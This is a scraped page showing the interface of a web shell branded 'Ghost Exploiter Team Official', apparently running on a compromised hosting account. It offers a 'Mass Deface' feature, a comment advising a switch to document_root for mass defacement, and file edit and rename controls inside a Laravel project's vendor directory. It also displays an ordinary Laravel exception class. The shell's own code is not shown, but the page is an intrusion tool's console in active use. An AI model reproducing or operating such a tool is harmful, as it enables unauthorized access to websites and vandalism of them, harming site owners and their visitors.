webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Process
/
Exceptions
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
ProcessFailedException.php
1.05KB
edt
ren
ProcessTimedOutExceptio
...
0.886KB
edt
ren
<?php namespace Illuminate\Process\Exceptions; use Illuminate\Contracts\Process\ProcessResult; use RuntimeException; class ProcessFailedException extends RuntimeException { /** * The process result instance. * * @var \Illuminate\Contracts\Process\ProcessResult */ public $result; /** * Create a new exception instance. * * @param \Illuminate\Contracts\Process\ProcessResult $result * @return void */ public function __construct(ProcessResult $result) { $this->result = $result; $error = sprintf('The command "%s" failed.'."\n\nExit Code: %s", $result->command(), $result->exitCode(), ); if (! empty($result->output())) { $error .= sprintf("\n\nOutput:\n================\n%s", $result->output()); } if (! empty($result->errorOutput())) { $error .= sprintf("\n\nError Output:\n================\n%s", $result->errorOutput()); } parent::__construct($error, $result->exitCode() ?? 1); } }
<=Back
Liking